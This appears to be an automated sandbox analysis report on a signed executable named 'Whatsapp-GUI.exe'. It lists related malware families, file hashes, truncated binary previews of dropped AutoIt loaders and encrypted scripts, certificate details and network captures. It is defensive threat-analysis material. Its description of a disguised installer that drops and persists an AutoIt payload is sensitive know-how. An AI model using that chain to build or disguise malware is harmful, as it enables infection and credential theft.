	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse	162.125.1.20
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	162.125.40.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	162.125.65.18 162.125.69.15
	FEDEX234598765.html	Get hash	malicious	WinSearchAbuse	Browse	162.125.65.18 162.125.69.15
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	162.125.65.18 162.125.69.15
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	162.125.65.18 162.125.69.15
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	162.125.65.18 162.125.69.15
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	162.125.65.18 162.125.69.15
	file.exe	Get hash	malicious	XWorm	Browse	162.125.65.18 162.125.69.15
	gjvU5KOFhX.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	162.125.65.18 162.125.69.15
	svhost.vbs	Get hash	malicious	Unknown	Browse	162.125.65.18 162.125.69.15

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Updater\Autoit3.exe	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse
	malware.zip	Get hash	malicious	Unknown	Browse
	Dark_drop_2_pers_lum_clean.exe.bin.exe	Get hash	malicious	LummaC, DarkGate, LummaC Stealer, MailPassView	Browse
	Agreement for YouTube cooperation.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	3rd_cc_form_Oct_2024.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	tQ6Z4Vjp5f.lnk	Get hash	malicious	LummaC	Browse
	doc-Impostos.cmd	Get hash	malicious	Unknown	Browse
	AlBXxWizEX.msi	Get hash	malicious	DanaBot	Browse
	dp36srsOd2.exe	Get hash	malicious	Unknown	Browse
C:\ProgramData\Updater\UpdaterService.exe (copy)	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse
	malware.zip	Get hash	malicious	Unknown	Browse
	Dark_drop_2_pers_lum_clean.exe.bin.exe	Get hash	malicious	LummaC, DarkGate, LummaC Stealer, MailPassView	Browse
	Agreement for YouTube cooperation.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	3rd_cc_form_Oct_2024.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	tQ6Z4Vjp5f.lnk	Get hash	malicious	LummaC	Browse
	doc-Impostos.cmd	Get hash	malicious	Unknown	Browse
	AlBXxWizEX.msi	Get hash	malicious	DanaBot	Browse
	dp36srsOd2.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Updater.zip

Download File

Process:	C:\Users\user\Desktop\Whatsapp-GUI.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	802739
Entropy (8bit):	7.998351560842118
Encrypted:	true
SSDEEP:	12288:3Dkq0C/sFxWWeu3OC45qZmLJVX2MJn0WVE17eGlEyU4PDNBk9LZ5eWLmHlle:39J/AMcR4oZm3h0d16K3/8eWLmFle
MD5:	5C7F3935A8FF564E33D8674D4E716A6A
SHA1:	ADE37ABA6A17E8EB98BEED5C4D590E4E93BD0E73
SHA-256:	3D31B03635EB488CA318F67E3555305A25DC260FE6F5E059E4675B1AE7E026A4
SHA-512:	DDAE6C3E401216CB318846C79C038A1AE8CFCE01EEEE9D55218F56C9A13CFB3C254A7F248D928DD7EBF1FAA7BD29A9747570505F0681E2D2F984F04C5F992864
Malicious:	false
Reputation:	low
Preview:	PK.........,.Y...vK...........Autoit3.exe..}\|SE.8..$.m...R.J.UQ...5.)m."-... ..FT....+Ih/C.wQ.].w..eWT.P."-.......S.h-..w.......<....0.s...3g.9s&..I.$...I.FI.9..._.A..].. i}....h....)...O.;......p.}.>......4..H..$eNHz.....<p`.d=...3WN..........7.o).g..{..Q.......<....2...Z(.y..[.]..b......O.s...S........W.........k..>x...D.KW...,...tP..3.FI.......!(F2``.S..H@^.....u=q{.=...w.T.IWZ$.g}>,.(.........g{?)Q...I.._..$.....s....o\|k......I..Y7.}..^IZ..Q...<.....u.,.I..........\....y...p.L.Y:..1...7..9..'Q....<x...0.8......oS....U.T.n...+....+. ....&..u".<..wP@...Y\|.....`.."..K%..5..P@>..Y..'....C^....C.A...].Yl...w.<..Z1`..81.r...E..Q.c.....6.~h...=..OP.......I....-s`t.~..=._....?.'..k...8.?.."n...R.}....TP.N..........DR.Pg......Wg&.3...\|..y_.V..L.,.g.aPg.Qg:.\5.fMQ...Y3.Yj.l..b.../..3.-.....~[........u:...n.Be}.A.fk.-..o.f.h...[...K...........%~.7..*.-S.....R....2..J.k.w..n..6....l{..%...0szK!k...:#.&../..ry&<7..:.@s\|.,e...-.&...

C:\ProgramData\Updater\Autoit3.exe

Download File

Process:	C:\Users\user\Desktop\Whatsapp-GUI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Agreement for Cooperation.PDF.lnk.download.lnk, Detection: malicious, Browse Filename: malware.zip, Detection: malicious, Browse Filename: Dark_drop_2_pers_lum_clean.exe.bin.exe, Detection: malicious, Browse Filename: Agreement for YouTube cooperation.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: 3rd_cc_form_Oct_2024.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: tQ6Z4Vjp5f.lnk, Detection: malicious, Browse Filename: doc-Impostos.cmd, Detection: malicious, Browse Filename: AlBXxWizEX.msi, Detection: malicious, Browse Filename: dp36srsOd2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\Updater\ConfigUpdater.a3x (copy)

Download File

Process:	C:\Users\user\Desktop\Whatsapp-GUI.exe
File Type:	data
Category:	dropped
Size (bytes):	596624
Entropy (8bit):	7.029606283483804
Encrypted:	false
SSDEEP:	12288:I5ar/5ar6gxOhHcM7hsYpzKiQhabk/RTTzcY886Wa:I5ar/5ar/8RcMlsYlKiURTPf6F
MD5:	3E44FEF10A982713ADB597DF2B72C27F
SHA1:	A0A12D6BC2D26267A6041344756B8621E02E1543
SHA-256:	F2F20D4232DA128F7DEDC0EDF844A92A3E3F6C8A997FAB47777A396B0B4A5F53
SHA-512:	55BBA6E5EF5DE02E46051A0DDD6B08F34D30C514FDA40C80A88519E0B64B5987F662CB3175893E1B2660D500B42EEA8A31A79AC7414F281DC159631EBDD46726
Malicious:	false
Preview:	Y p...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Y p.....................................

C:\ProgramData\Updater\UpdaterService.exe (copy)

Download File

Process:	C:\Users\user\Desktop\Whatsapp-GUI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Agreement for Cooperation.PDF.lnk.download.lnk, Detection: malicious, Browse Filename: malware.zip, Detection: malicious, Browse Filename: Dark_drop_2_pers_lum_clean.exe.bin.exe, Detection: malicious, Browse Filename: Agreement for YouTube cooperation.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: 3rd_cc_form_Oct_2024.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: tQ6Z4Vjp5f.lnk, Detection: malicious, Browse Filename: doc-Impostos.cmd, Detection: malicious, Browse Filename: AlBXxWizEX.msi, Detection: malicious, Browse Filename: dp36srsOd2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\Updater\script.a3x

Download File

Process:	C:\Users\user\Desktop\Whatsapp-GUI.exe
File Type:	data
Category:	dropped
Size (bytes):	596624
Entropy (8bit):	7.029606283483804
Encrypted:	false
SSDEEP:	12288:I5ar/5ar6gxOhHcM7hsYpzKiQhabk/RTTzcY886Wa:I5ar/5ar/8RcMlsYlKiURTPf6F
MD5:	3E44FEF10A982713ADB597DF2B72C27F
SHA1:	A0A12D6BC2D26267A6041344756B8621E02E1543
SHA-256:	F2F20D4232DA128F7DEDC0EDF844A92A3E3F6C8A997FAB47777A396B0B4A5F53
SHA-512:	55BBA6E5EF5DE02E46051A0DDD6B08F34D30C514FDA40C80A88519E0B64B5987F662CB3175893E1B2660D500B42EEA8A31A79AC7414F281DC159631EBDD46726
Malicious:	false
Preview:	Y p...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Y p.....................................

C:\ProgramData\addbage\Autoit3.exe

Download File

Process:	C:\ProgramData\Updater\UpdaterService.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\addbage\ecbdahe

Download File

Process:	C:\ProgramData\addbage\Autoit3.exe
File Type:	data
Category:	dropped
Size (bytes):	1069
Entropy (8bit):	4.827990010384767
Encrypted:	false
SSDEEP:	12:Iwhjb2D2OFgRnBdTsSGeatbr5xSELxonWKR:I6jivUBdTzHObrPtWr
MD5:	77CF11894A9EF136F245FBCECBA8605E
SHA1:	21F96DF41FC6B98AECA92594F8F8B115F1DA9655
SHA-256:	1F041B930547DBA62E43CE9805BFDC5FDEA673CF355C7DAE3757966C0A9FBBA8
SHA-512:	A6C9E451BA9F40628E71984C39FBB896F02D17705BB783CF1E80EB6A48DBCE07E1B16E0B96FC043460FCD09A5947B4877ECABE07DD7DD1350163488B86789429
Malicious:	false
Preview:	...'0.-chSMbLooHHzPfj.tF;..%1qOijRHuOhiTtFNchSMbLooHHzPfj.tFFc..tFOod1.-.-8..l.2,.."^;+..>sThTD...-5L.=. .+...5M<=.i Hu7..78?8-.7.Atoj[OAtom[ ).SSWLqFnTlHq';ks.Lc..tFMc..tFJc..tFOfdWI\|sTo[7#sTn[7#sTh_DxNgoksyC.6ks~Oc..tFLmd?.?sTjWD..SSTLq.48..%.;iWJuKSSTOq01TlK{C. 3#...5ks~Fc..tFLgdTtFMkd(.At8..-C-2.(<..+.l.l..Q6..a.+.0i0#3.5.!;H$W4(+"q.%:?L\|Mh...-Jp`%!1.8.1S921.)]`?.{/.At>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9..,.>9.

C:\ProgramData\addbage\ffdghbb.a3x

Download File

Process:	C:\ProgramData\Updater\UpdaterService.exe
File Type:	data
Category:	dropped
Size (bytes):	596624
Entropy (8bit):	7.029606283483804
Encrypted:	false
SSDEEP:	12288:I5ar/5ar6gxOhHcM7hsYpzKiQhabk/RTTzcY886Wa:I5ar/5ar/8RcMlsYlKiURTPf6F
MD5:	3E44FEF10A982713ADB597DF2B72C27F
SHA1:	A0A12D6BC2D26267A6041344756B8621E02E1543
SHA-256:	F2F20D4232DA128F7DEDC0EDF844A92A3E3F6C8A997FAB47777A396B0B4A5F53
SHA-512:	55BBA6E5EF5DE02E46051A0DDD6B08F34D30C514FDA40C80A88519E0B64B5987F662CB3175893E1B2660D500B42EEA8A31A79AC7414F281DC159631EBDD46726
Malicious:	false
Preview:	Y p...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Y p.....................................

C:\ProgramData\addbage\gcdkfcc

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	2.9625983186791407
Encrypted:	false
SSDEEP:	3:Qh9eolFl+H7lffYn:Q7eY+an
MD5:	E9E0F68A47870916B1B878E10455E702
SHA1:	6919BA8AE052C5C5C1623D323CB59B7A35B6B639
SHA-256:	7F0A7B316CCDCE7B5A1C3CAD097E48504EF4C906011C45155F4E78D00C81DD94
SHA-512:	EF9474A70C2C48AE76B94B2030F6331818285E64B60576996B335C7C5138C79ADC7DF2D7895A478FF7E9EACBEDB3EEAF6E9657DFB2748D8DC82BFE47633C66ED
Malicious:	false
Preview:	..D.o.m.a.i.n. . .....L.z.d.F.X. . . .....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Whatsapp-GUI.exe.log

Download File

Process:	C:\Users\user\Desktop\Whatsapp-GUI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1533
Entropy (8bit):	5.35484997790683
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4q4E4TybE4K+E4Ks:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0H8
MD5:	96735776E43AE2A19D709C4B9997A0E1
SHA1:	B17AF3C37E3B19AF8C620F3B5ED8D7E55B8A89C7
SHA-256:	48EE6F035AE3B4462E8FDE5B12B2306101072C69041E0DFD32C1CF362EA82473
SHA-512:	052B4E082FDEA9EF6FC5666EC9F8451F5663587A177252B29FBE4E623A00355FE40BD102C3ACD825EC87FF323342C6A459E5A638D10A27BA1D38A12B69A306B3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Roaming\ccfbbHC

Download File

Process:	C:\ProgramData\Updater\UpdaterService.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.4292292966721747
Encrypted:	false
SSDEEP:	3:xpzlcn:xpSn
MD5:	CC1BC71588450ED3B1C17EAA22AD8140
SHA1:	E7A07921B87B9DD225BD05ADC3BEC0DFF366C038
SHA-256:	9EB945474A7690C8CDBE7361824440DCD1933627AAC9210AC7C92EEF34093F74
SHA-512:	4D3995C8D0215518561B9849D09E54FACEBB7306E04A74EFC77F92F2F9AE38D5B8127A349058103593AE5DEFACD8EC210754024B007F362C96A96BFDF8CD09C2
Malicious:	false
Preview:	FAKeeGhCEdFcHcKeAEEdcHFKeaCKdAcE

C:\temp\dehbgch

Download File

Process:	C:\ProgramData\Updater\UpdaterService.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:k:k
MD5:	23EB13E4AEC7767E7252E9B06F29E27A
SHA1:	891C9CF52A2A04F55CE66F425E568E1E04464C5C
SHA-256:	FBA731A556E769D9D73DBDC095B6F8E35D22E5A26A0767D3126E93B322B62C34
SHA-512:	26106F65E8508317CEB43646FE0E1B1FBDA0611FD399B9CFB0909CB54873B9EF738818FFE52BF7B6C8B834B7DB9590A59D06C15E627ECBFB2F07C7B67E61C7E1
Malicious:	false
Preview:	KbUS

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.792408761328189
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Whatsapp-GUI.exe
File size:	285'584 bytes
MD5:	8c3ef2eba970f543f0ebe6dced908402
SHA1:	431157eaf15244e5d8cc167511b4611f4dfae85c
SHA256:	9e4f036dd6fbb45ce414cb5d040b3255b5ccc9ecacbfaf022b631545f9a19a02
SHA512:	fd0e2b2539ad4a0d587ba0059653d82e2bf4aadf37ca5a097b60fc0658aa1b3850bb589ee1cc0d5c39bfc574beaa4d56eea6a32f57407bfee21b2f306c737680
SSDEEP:	3072:FUbtVKuFEC34/8yBV+VKuFJC34GtmANWJ/j3:FUb/KVKq8NKmKntZWJT
TLSH:	67546795A720D91EC8A7473ACC73EA522F63FC185555932E02987625BD313A30ADB3CF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b............"...0..N...........l... ........@.. ...............................{....`................................

File Icon


Icon Hash:	0f458aa8a2466a94

Static PE Info

General

Entrypoint:	0x426cfa
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8CE2628A [Fri Nov 25 00:30:02 2044 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	14/11/2024 21:33:14 15/11/2025 21:33:14
Subject Chain	E=phandinhtrinh1981@gmail.com, CN=XUAN THANH CEMENT JOINT STOCK COMPANY, O=XUAN THANH CEMENT JOINT STOCK COMPANY, STREET="Thon Bong Lang, Xa Thanh Nghi, Huyen Thanh Liem", L=Ha Nam, S=Ha Nam, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Nam, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0700576529, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	74B2851393952520C30CF0295244CF71
Thumbprint SHA-1:	D2BA1F548EB15270386A9D203FCA3A0379A09913
Thumbprint SHA-256:	710F4AF0801AD3EAEF2B61D2968A7A3CF88529B5809C196E53EA4D3F859AEE5F
Serial:	34F3E42F122C45100811225D

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26ca8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28000	0x1df50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x43200	0x2990	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x46000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x26c08	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x24d00	0x24e00	b7e91f7f5fba5c73c9fa3553c78ff014	False	0.405078125	data	5.910523944300644	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x28000	0x1df50	0x1e000	db3efc795b1196fa8ddb072e4d311c1e	False	0.3109049479166667	data	5.385303443820913	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x46000	0xc	0x200	6b52c467ee740ef05e82ec8fa718880d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x281a0	0x5267	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9963498459350557
RT_ICON	0x2d418	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.12329942032414527
RT_ICON	0x3dc50	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.20707368918280586
RT_ICON	0x41e88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.2730290456431535
RT_ICON	0x44440	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.3602251407129456
RT_ICON	0x454f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.5771276595744681
RT_GROUP_ICON	0x45970	0x5a	data	0.7666666666666667
RT_VERSION	0x459dc	0x374	data	0.4264705882352941
RT_MANIFEST	0x45d60	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 21:52:54.890681028 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:54.890719891 CET	443	49710	162.125.65.18	192.168.2.5
Dec 14, 2024 21:52:54.890793085 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:54.902916908 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:54.902935028 CET	443	49710	162.125.65.18	192.168.2.5
Dec 14, 2024 21:52:56.286309958 CET	443	49710	162.125.65.18	192.168.2.5
Dec 14, 2024 21:52:56.286417961 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:56.293880939 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:56.293926954 CET	443	49710	162.125.65.18	192.168.2.5
Dec 14, 2024 21:52:56.294337988 CET	443	49710	162.125.65.18	192.168.2.5
